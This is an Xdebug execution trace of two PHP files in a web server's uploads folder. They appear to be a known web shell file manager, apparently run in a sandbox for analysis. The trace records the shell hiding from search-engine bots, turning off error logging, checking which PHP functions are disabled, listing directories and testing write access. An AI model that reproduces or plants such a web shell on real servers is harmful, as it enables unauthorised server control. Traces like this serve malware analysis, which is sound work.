3 326 0 0.210615 1023624 array_merge 0 /var/www/html/uploads/deobf.php 1344 2 [0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']] [0 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 1 => ['name' => 'deobf.php', 'path' => '/var/www/html/uploads/deobf.php', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 100449, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'], 2 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']]
3 326 1 0.210664 1024064
3 326 R [0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 2 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 3 => ['name' => 'deobf.php', 'path' => '/var/www/html/uploads/deobf.php', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 100449, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'], 4 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']]
2 A /var/www/html/uploads/deobf.php 1344 $files = [0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 2 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 3 => ['name' => 'deobf.php', 'path' => '/var/www/html/uploads/deobf.php', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 100449, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'], 4 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']]
2 A /var/www/html/uploads/deobf.php 1345 $l = 0
3 327 0 0.210766 1023680 base64_encode 0 /var/www/html/uploads/deobf.php 1346 1 '/var/www/html/uploads/..'
3 327 1 0.210780 1023776
3 327 R 'L3Zhci93d3cvaHRtbC91cGxvYWRzLy4u'
3 328 0 0.210798 1023776 htmlspecialchars 0 /var/www/html/uploads/deobf.php 1349 1 '..'
3 328 1 0.210812 1023968
3 328 R '..'
3 329 0 0.210827 1023848 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 '..'
3 329 1 0.210840 1023912
3 329 R '..'
3 330 0 0.210853 1023944 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 '..'
3 330 1 0.210866 1024008
3 330 R '..'
3 331 0 0.210879 1024072 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 '..'
3 331 1 0.210891 1024136
3 331 R '..'
3 332 0 0.210905 1024136 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 '..'
3 332 1 0.210917 1024200
3 332 R '..'
2 A /var/www/html/uploads/deobf.php 1350 $l = 1
3 333 0 0.210942 1023688 base64_encode 0 /var/www/html/uploads/deobf.php 1346 1 '/var/www/html/uploads/data'
3 333 1 0.210955 1023800
3 333 R 'L3Zhci93d3cvaHRtbC91cGxvYWRzL2RhdGE='
3 334 0 0.210972 1023800 htmlspecialchars 0 /var/www/html/uploads/deobf.php 1349 1 'data'
3 334 1 0.210985 1023992
3 334 R 'data'
3 335 0 0.210999 1023848 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 'data'
3 335 1 0.211012 1023912
3 335 R 'data'
3 336 0 0.211025 1023944 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 'data'
3 336 1 0.211037 1024008
3 336 R 'data'
3 337 0 0.211050 1024072 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 'data'
3 337 1 0.211063 1024136
3 337 R 'data'
3 338 0 0.211076 1024264 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 'data'
3 338 1 0.211088 1024328
3 338 R 'data'
2 A /var/www/html/uploads/deobf.php 1350 $l = 0
3 339 0 0.211113 1023680 urlencode 0 /var/www/html/uploads/deobf.php 1346 1 '.htaccess'
3 339 1 0.211125 1023752
3 339 R '.htaccess'
3 340 0 0.211139 1023720 base64_encode 0 /var/www/html/uploads/deobf.php 1346 1 '.htaccess'
3 340 1 0.211151 1023800
3 340 R 'Lmh0YWNjZXNz'
3 341 0 0.211166 1023760 htmlspecialchars 0 /var/www/html/uploads/deobf.php 1346 1 '.htaccess'
3 341 1 0.211179 1023952
3 341 R '.htaccess'
3 342 0 0.211193 1023752 yemenSize 1 /var/www/html/uploads/deobf.php 1349 1 64
3 342 1 0.211208 1023784
3 342 R '64 B'
3 343 0 0.211221 1023816 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 '.htaccess'
3 343 1 0.211239 1023888
3 343 R '.htaccess'
3 344 0 0.211253 1023944 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 '.htaccess'
3 344 1 0.211265 1024016
3 344 R '.htaccess'
3 345 0 0.211279 1024072 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 '.htaccess'
3 345 1 0.211292 1024144
3 345 R '.htaccess'
3 346 0 0.211305 1024136 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 '.htaccess'
3 346 1 0.211317 1024208
3 346 R '.htaccess'
3 347 0 0.211331 1024328 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 '.htaccess'
3 347 1 0.211342 1024400
3 347 R '.htaccess'
3 348 0 0.211356 1024392 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 '.htaccess'
3 348 1 0.211368 1024464
3 348 R '.htaccess'
2 A /var/www/html/uploads/deobf.php 1350 $l = 1
3 349 0 0.211398 1023688 urlencode 0 /var/www/html/uploads/deobf.php 1346 1 'deobf.php'
3 349 1 0.211411 1023760
3 349 R 'deobf.php'
3 350 0 0.211424 1023728 base64_encode 0 /var/www/html/uploads/deobf.php 1346 1 'deobf.php'
3 350 1 0.211437 1023808
3 350 R 'ZGVvYmYucGhw'
3 351 0 0.211452 1023768 htmlspecialchars 0 /var/www/html/uploads/deobf.php 1346 1 'deobf.php'
3 351 1 0.211465 1023960
3 351 R 'deobf.php'
3 352 0 0.211480 1023752 yemenSize 1 /var/www/html/uploads/deobf.php 1349 1 100449
4 353 0 0.211493 1023752 sprintf 0 /var/www/html/uploads/deobf.php 1279 2 '%1.2f' 98.0947265625
4 353 1 0.211509 1024136
4 353 R '98.09'
3 352 1 0.211522 1023792
3 352 R '98.09 KB'
3 354 0 0.211537 1023816 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 'deobf.php'
3 354 1 0.211550 1023888
3 354 R 'deobf.php'
3 355 0 0.211564 1023944 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 'deobf.php'
3 355 1 0.211576 1024016
3 355 R 'deobf.php'
3 356 0 0.211590 1024072 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 'deobf.php'
3 356 1 0.211602 1024144
3 356 R 'deobf.php'
3 357 0 0.211615 1024136 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 'deobf.php'
3 357 1 0.211627 1024208
3 357 R 'deobf.php'
3 358 0 0.211641 1024328 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 'deobf.php'
3 358 1 0.211653 1024400
3 358 R 'deobf.php'
3 359 0 0.211666 1024392 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 'deobf.php'
3 359 1 0.211678 1024464
3 359 R 'deobf.php'
2 A /var/www/html/uploads/deobf.php 1350 $l = 0
3 360 0 0.211706 1023680 urlencode 0 /var/www/html/uploads/deobf.php 1346 1 'prepend.php'
3 360 1 0.211719 1023752
3 360 R 'prepend.php'
3 361 0 0.211733 1023720 base64_encode 0 /var/www/html/uploads/deobf.php 1346 1 'prepend.php'
3 361 1 0.211745 1023800
3 361 R 'cHJlcGVuZC5waHA='
3 362 0 0.211760 1023760 htmlspecialchars 0 /var/www/html/uploads/deobf.php 1346 1 'prepend.php'
3 362 1 0.211773 1023952
3 362 R 'prepend.php'
3 363 0 0.211787 1023752 yemenSize 1 /var/www/html/uploads/deobf.php 1349 1 57
3 363 1 0.211801 1023784
3 363 R '57 B'
3 364 0 0.211815 1023816 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 'prepend.php'
3 364 1 0.211828 1023888
3 364 R 'prepend.php'
3 365 0 0.211842 1023944 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 'prepend.php'
3 365 1 0.211854 1024016
3 365 R 'prepend.php'
3 366 0 0.211868 1024072 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 'prepend.php'
3 366 1 0.211880 1024144
3 366 R 'prepend.php'
3 367 0 0.211893 1024136 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 'prepend.php'
3 367 1 0.211906 1024208
3 367 R 'prepend.php'
3 368 0 0.211919 1024328 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 'prepend.php'
3 368 1 0.211932 1024400
3 368 R 'prepend.php'
3 369 0 0.211945 1024392 urlencode 0 /var/www/html/uploads/deobf.php 1349 1 'prepend.php'
3 369 1 0.211957 1024464
3 369 R 'prepend.php'
2 A /var/www/html/uploads/deobf.php 1350 $l = 1
3 370 0 0.211982 1023624 htmlspecialchars 0 /var/www/html/uploads/deobf.php 1353 1 '/var/www/html/uploads/'
3 370 1 0.211996 1023816
3 370 R '/var/www/html/uploads/'
3 371 0 0.212012 1023624 yemenfooter 1 /var/www/html/uploads/deobf.php 1356 0
4 372 0 0.212024 1023624 is_writable 0 /var/www/html/uploads/deobf.php 1174 1 '/var/www/html/uploads/'
4 372 1 0.212041 1023664
4 372 R TRUE
3 A /var/www/html/uploads/deobf.php 1174 $is_writable = '<font color=#00ff00 >[ Writeable ]</font>'
4 373 0 0.212069 1023624 htmlspecialchars 0 /var/www/html/uploads/deobf.php 1201 1 '/var/www/html/uploads/'
4 373 1 0.212082 1023816
4 373 R '/var/www/html/uploads/'
3 371 1 0.212098 1023624
2 25 1 0.212107 1016440
0.212144 926448
TRACE END [2023-02-12 22:14:18.678732]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:32:48.992656]
1 0 1 0.000189 393528
1 3 0 0.002809 1004624 {main} 1 /var/www/html/uploads/flowers1.php 0 0
2 4 0 0.002833 1004624 define 0 /var/www/html/uploads/flowers1.php 2 2 'VERSION' '2.0'
2 4 1 0.002849 1004728
2 4 R TRUE
2 5 0 0.002864 1004656 error_reporting 0 /var/www/html/uploads/flowers1.php 3 1 1
2 5 1 0.002878 1004696
2 5 R 0
2 6 0 0.002891 1004656 session_start 0 /var/www/html/uploads/flowers1.php 4 0
2 6 1 0.002946 1005408
2 6 R TRUE
2 7 0 0.002962 1005408 ini_set 0 /var/www/html/uploads/flowers1.php 5 2 'error_log' NULL
2 7 1 0.002978 1005480
2 7 R ''
2 8 0 0.002991 1005408 ini_set 0 /var/www/html/uploads/flowers1.php 6 2 'log_errors' 0
2 8 1 0.003006 1005480
2 8 R '1'
2 9 0 0.003019 1005408 ini_set 0 /var/www/html/uploads/flowers1.php 7 2 'max_execution_time' 0
2 9 1 0.003034 1005512
2 9 R '30'
2 10 0 0.003047 1005408 set_time_limit 0 /var/www/html/uploads/flowers1.php 8 1 0
2 10 1 0.003061 1005472
2 10 R FALSE
2 11 0 0.003076 1005440 preg_match 0 /var/www/html/uploads/flowers1.php 9 2 '/(Google|robot|bot|bing|yahoo|facebook|visionutils)/Ui' 'python-requests/2.25.1'
2 11 1 0.003094 1005504
2 11 R 0
2 12 0 0.003108 1005440 base64_decode 0 /var/www/html/uploads/flowers1.php 11 2 NULL TRUE
2 12 1 0.003123 1005536
2 12 R ''
1 A /var/www/html/uploads/flowers1.php 12 $default_action = 'FilesMan'
1 A /var/www/html/uploads/flowers1.php 13 $default_use_ajax = TRUE
1 A /var/www/html/uploads/flowers1.php 14 $default_charset = 'Windows-1251'
2 13 0 0.003170 1005440 substr 0 /var/www/html/uploads/flowers1.php 15 3 'Linux' 0 3
2 13 1 0.003185 1005568
2 13 R 'Lin'
2 14 0 0.003198 1005472 strtolower 0 /var/www/html/uploads/flowers1.php 15 1 'Lin'
2 14 1 0.003215 1005536
2 14 R 'lin'
1 A /var/www/html/uploads/flowers1.php 16 $sys = 'unix'
2 15 0 0.003290 1005440 getcwd 0 /var/www/html/uploads/flowers1.php 17 0
2 15 1 0.003305 1005488
2 15 R '/var/www/html/uploads'
1 A /var/www/html/uploads/flowers1.php 17 $home_cwd = '/var/www/html/uploads'
2 16 0 0.003333 1005488 base64_decode 0 /var/www/html/uploads/flowers1.php 18 2 NULL TRUE
2 16 1 0.003347 1005584
2 16 R ''
2 17 0 0.003361 1005488 chdir 0 /var/www/html/uploads/flowers1.php 19 1 NULL
2 17 1 0.003381 1005576
2 17 R FALSE
2 18 0 0.003395 1005536 getcwd 0 /var/www/html/uploads/flowers1.php 20 0
2 18 1 0.003408 1005584
2 18 R '/var/www/html/uploads'
1 A /var/www/html/uploads/flowers1.php 20 $cwd = '/var/www/html/uploads'
1 A /var/www/html/uploads/flowers1.php 23 $cwd .= '/'
2 19 0 0.003445 1005584 getcwd 0 /var/www/html/uploads/flowers1.php 39 0
2 19 1 0.003457 1005632
2 19 R '/var/www/html/uploads'
1 A /var/www/html/uploads/flowers1.php 39 $down = '/var/www/html/uploads'
1 A /var/www/html/uploads/flowers1.php 41 $down .= '/'
2 20 0 0.003492 1005632 function_exists 0 /var/www/html/uploads/flowers1.php 1272 1 'posix_getpwuid'
2 20 1 0.003506 1005672
2 20 R TRUE
2 21 0 0.003519 1005632 function_exists 0 /var/www/html/uploads/flowers1.php 1273 1 'posix_getgrgid'
2 21 1 0.003532 1005672
2 21 R TRUE
2 22 0 0.003545 1005632 function_exists 0 /var/www/html/uploads/flowers1.php 1302 1 'scandir'
2 22 1 0.003558 1005672
2 22 R TRUE
2 23 0 0.003573 1005672 function_exists 0 /var/www/html/uploads/flowers1.php 3079 1 'yemenFilesMan'
2 23 1 0.003586 1005712
2 23 R TRUE
1 A /var/www/html/uploads/flowers1.php 3079 _POST['a'] = 'FilesMan'
2 24 0 0.003613 1006048 function_exists 0 /var/www/html/uploads/flowers1.php 3081 1 'yemenFilesMan'
2 24 1 0.003626 1006088
2 24 R TRUE
2 25 0 0.003640 1006008 yemenFilesMan 1 /var/www/html/uploads/flowers1.php 3081 0
3 26 0 0.003653 1006008 yemenhead 1 /var/www/html/uploads/flowers1.php 1305 0
3 A /var/www/html/uploads/flowers1.php 49 _POST['charset'] = 'Windows-1251'
4 27 0 0.003684 1005984 diskfreespace 0 /var/www/html/uploads/flowers1.php 50 1 '/var/www/html/uploads/'
4 27 1 0.003701 1006016
4 27 R 202862895104
3 A /var/www/html/uploads/flowers1.php 50 $freeSpace = 202862895104
4 28 0 0.003736 1005984 disk_total_space 0 /var/www/html/uploads/flowers1.php 51 1 '/var/www/html/uploads/'
4 28 1 0.003756 1006016
4 28 R 232015802368
3 A /var/www/html/uploads/flowers1.php 51 $totalSpace = 232015802368
3 A /var/www/html/uploads/flowers1.php 52 $totalSpace = 232015802368
3 A /var/www/html/uploads/flowers1.php 53 $on = '<font color=#0F0> ON </font>'
3 A /var/www/html/uploads/flowers1.php 54 $of = '<font color=red> OFF </font>'
3 A /var/www/html/uploads/flowers1.php 55 $none = '<font color=#0F0> NONE </font>'
4 29 0 0.003827 1005984 function_exists 0 /var/www/html/uploads/flowers1.php 56 1 'curl_version'
4 29 1 0.003842 1006024
4 29 R TRUE
3 A /var/www/html/uploads/flowers1.php 56 $curl = '<font color=#0F0> ON </font>'
4 30 0 0.003866 1005984 function_exists 0 /var/www/html/uploads/flowers1.php 58 1 'mysql_get_client_info'
4 30 1 0.003880 1006024
4 30 R FALSE
3 A /var/www/html/uploads/flowers1.php 59 $mysql = '<font color=red> OFF </font>'
4 31 0 0.003905 1005984 function_exists 0 /var/www/html/uploads/flowers1.php 60 1 'mssql_connect'
4 31 1 0.003918 1006024
4 31 R FALSE
3 A /var/www/html/uploads/flowers1.php 61 $mssql = '<font color=red> OFF </font>'
4 32 0 0.003942 1005984 function_exists 0 /var/www/html/uploads/flowers1.php 62 1 'pg_connect'
4 32 1 0.003955 1006024
4 32 R FALSE
3 A /var/www/html/uploads/flowers1.php 63 $pg = '<font color=red> OFF </font>'
4 33 0 0.003979 1005984 function_exists 0 /var/www/html/uploads/flowers1.php 64 1 'oci_connect'
4 33 1 0.003992 1006024
4 33 R FALSE
3 A /var/www/html/uploads/flowers1.php 65 $or = '<font color=red> OFF </font>'
4 34 0 0.004016 1005984 ini_get 0 /var/www/html/uploads/flowers1.php 66 1 'disable_functions'
4 34 1 0.004030 1006464
4 34 R 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
4 35 0 0.004056 1005984 ini_get 0 /var/www/html/uploads/flowers1.php 72 1 'disable_functions'
4 35 1 0.004069 1006464
4 35 R 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
4 36 0 0.004093 1006432 str_replace 0 /var/www/html/uploads/flowers1.php 72 3 ',' ', ' 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
4 36 1 0.004117 1006976
4 36 R 'pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled, pcntl_wifcontinued, pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_get_handler, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_exec, pcntl_getpriority, pcntl_setpriority, pcntl_async_signals, '
3 A /var/www/html/uploads/flowers1.php 72 $disfun = '<span>Disabled functions : </span><font color=red style="word-wrap: break-word;\r\n\r\n\r\nwidth: 80%;\r\n\r\n\r\n " >pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled, pcntl_wifcontinued, pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_get_handler, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_exec, pcntl_getpriority, pcntl_setpriority, pcntl_as'
4 37 0 0.004166 1006624 ini_get 0 /var/www/html/uploads/flowers1.php 74 1 'safe_mode'
4 37 1 0.004180 1006656
4 37 R FALSE
3 A /var/www/html/uploads/flowers1.php 75 $safe_modes = '<font color=#0F0 >OFF</font>'
4 38 0 0.004205 1006624 ini_get 0 /var/www/html/uploads/flowers1.php 76 1 'open_basedir'
4 38 1 0.004218 1006656
4 38 R ''
3 A /var/www/html/uploads/flowers1.php 77 $open_b = '<font color=#0F0> NONE </font>'
4 39 0 0.004244 1006624 ini_get 0 /var/www/html/uploads/flowers1.php 78 1 'safe_mode_exec_dir'
4 39 1 0.004257 1006656
4 39 R FALSE
3 A /var/www/html/uploads/flowers1.php 79 $safe_exe = '<font color=#0F0> NONE </font>'
4 40 0 0.004282 1006624 ini_get 0 /var/www/html/uploads/flowers1.php 80 1 'safe_mode_include_dir'
4 40 1 0.004295 1006656
4 40 R FALSE
3 A /var/www/html/uploads/flowers1.php 81 $safe_include = '<font color=#0F0> NONE </font>'
4 41 0 0.004325 1006624 function_exists 0 /var/www/html/uploads/flowers1.php 82 1 'posix_getegid'
4 41 1 0.004338 1006664
4 41 R TRUE
4 42 0 0.004351 1006624 posix_geteuid 0 /var/www/html/uploads/flowers1.php 86 0
4 42 1 0.004364 1006624
4 42 R 33
4 43 0 0.004377 1006624 posix_getpwuid 0 /var/www/html/uploads/flowers1.php 86 1 33
4 43 1 0.004408 1007456
4 43 R ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
3 A /var/www/html/uploads/flowers1.php 86 $uid = ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
4 44 0 0.004452 1007424 posix_getegid 0 /var/www/html/uploads/flowers1.php 87 0
4 44 1 0.004464 1007424
4 44 R 33
4 45 0 0.004477 1007424 posix_getgrgid 0 /var/www/html/uploads/flowers1.php 87 1 33
4 45 1 0.004502 1008088
4 45 R ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
3 A /var/www/html/uploads/flowers1.php 87 $gid = ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
3 A /var/www/html/uploads/flowers1.php 88 $user = 'www-data'
3 A /var/www/html/uploads/flowers1.php 89 $uid = 33
3 A /var/www/html/uploads/flowers1.php 90 $group = 'www-data'
3 A /var/www/html/uploads/flowers1.php 91 $gid = 33
3 A /var/www/html/uploads/flowers1.php 92 $cwd_links = ''
4 46 0 0.004590 1006704 explode 0 /var/www/html/uploads/flowers1.php 93 2 '/' '/var/www/html/uploads/'
4 46 1 0.004604 1007312
4 46 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 A /var/www/html/uploads/flowers1.php 93 $path = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 A /var/www/html/uploads/flowers1.php 94 $n = 6
3 A /var/www/html/uploads/flowers1.php 95 $i = 0
3 A /var/www/html/uploads/flowers1.php 97 $cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
3 A /var/www/html/uploads/flowers1.php 98 $j = 0
3 A /var/www/html/uploads/flowers1.php 100 $cwd_links .= '/'
3 A /var/www/html/uploads/flowers1.php 100 $j++
3 A /var/www/html/uploads/flowers1.php 101 $cwd_links .= '")\'>/</a>'
3 A /var/www/html/uploads/flowers1.php 97 $i++
3 A /var/www/html/uploads/flowers1.php 97 $cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
3 A /var/www/html/uploads/flowers1.php 98 $j = 0
3 A /var/www/html/uploads/flowers1.php 100 $cwd_links .= '/'
3 A /var/www/html/uploads/flowers1.php 100 $j++
3 A /var/www/html/uploads/flowers1.php 100 $cwd_links .= 'var/'
3 A /var/www/html/uploads/flowers1.php 100 $j++
3 A /var/www/html/uploads/flowers1.php 101 $cwd_links .= '")\'>var/</a>'
3 A /var/www/html/uploads/flowers1.php 97 $i++
3 A /var/www/html/uploads/flowers1.php 97 $cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
3 A /var/www/html/uploads/flowers1.php 98 $j = 0
3 A /var/www/html/uploads/flowers1.php 100 $cwd_links .= '/'
3 A /var/www/html/uploads/flowers1.php 100 $j++
3 A /var/www/html/uploads/flowers1.php 100 $cwd_links .= 'var/'
3 A /var/www/html/uploads/flowers1.php 100 $j++
3 A /var/www/html/uploads/flowers1.php 100 $cwd_links .= 'www/'
3 A /var/www/html/uploads/flowers1.php 100 $j++
3 A /var/www/html/uploads/flowers1.php 101 $cwd_links .= '")\'>www/</a>'
3 A /var/www/html/uploads/flowers1.php 97 $i++
3 A /var/www/html/uploads/flowers1.php 97 $cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
3 A /var/www/html/uploads/flowers1.php 98 $j = 0
3 A /var/www/html/uploads/flowers1.php 100 $cwd_links .= '/'
3 A /var/www/html/uploads/flowers1.php 100 $j++
3 A /var/www/html/uploads/flowers1.php 100 $cwd_links .= 'var/'
3 A /var/www/html/uploads/flowers1.php 100 $j++
3 A /var/www/html/uploads/flowers1.php 100 $cwd_links .= 'www/'
3 A /var/www/html/uploads/flowers1.php 100 $j++
3 A /var/www/html/uploads/flowers1.php 100 $cwd_links .= 'html/'
3 A /var/www/html/uploads/flowers1.php 100 $j++
3 A /var/www/html/uploads/flowers1.php 101 $cwd_links .= '")\'>html/</a>'
3 A /var/www/html/uploads/flowers1.php 97 $i++
3 A /var/www/html/uploads/flowers1.php 97 $cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
3 A /var/www/html/uploads/flowers1.php 98 $j = 0
3 A /var/www/html/uploads/flowers1.php 100 $cwd_links .= '/'
3 A /var/www/html/uploads/flowers1.php 100 $j++
3 A /var/www/html/uploads/flowers1.php 100 $cwd_links .= 'var/'
3 A /var/www/html/uploads/flowers1.php 100 $j++
3 A /var/www/html/uploads/flowers1.php 100 $cwd_links .= 'www/'
3 A /var/www/html/uploads/flowers1.php 100 $j++
3 A /var/www/html/uploads/flowers1.php 100 $cwd_links .= 'html/'
3 A /var/www/html/uploads/flowers1.php 100 $j++
3 A /var/www/html/uploads/flowers1.php 100 $cwd_links .= 'uploads/'
3 A /var/www/html/uploads/flowers1.php 100 $j++
3 A /var/www/html/uploads/flowers1.php 101 $cwd_links .= '")\'>uploads/</a>'
3 A /var/www/html/uploads/flowers1.php 97 $i++
3 A /var/www/html/uploads/flowers1.php 102 $drives = ''
4 47 0 0.005148 1007560 range 0 /var/www/html/uploads/flowers1.php 103 2 'c' 'z'
4 47 1 0.005163 1008960
4 47 R [0 => 'c', 1 => 'd', 2 => 'e', 3 => 'f', 4 => 'g', 5 => 'h', 6 => 'i', 7 => 'j', 8 => 'k', 9 => 'l', 10 => 'm', 11 => 'n', 12 => 'o', 13 => 'p', 14 => 'q', 15 => 'r', 16 => 's', 17 => 't', 18 => 'u', 19 => 'v', 20 => 'w', 21 => 'x', 22 => 'y', 23 => 'z']
4 48 0 0.005195 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'c:'
4 48 1 0.005214 1008968
4 48 R FALSE
4 49 0 0.005229 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'd:'
4 49 1 0.005244 1008968
4 49 R FALSE
4 50 0 0.005258 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'e:'
4 50 1 0.005273 1008968
4 50 R FALSE
4 51 0 0.005287 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'f:'
4 51 1 0.005301 1008968
4 51 R FALSE
4 52 0 0.005315 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'g:'
4 52 1 0.005329 1008968
4 52 R FALSE
4 53 0 0.005342 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'h:'
4 53 1 0.005357 1008968
4 53 R FALSE
4 54 0 0.005369 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'i:'
4 54 1 0.005384 1008968
4 54 R FALSE
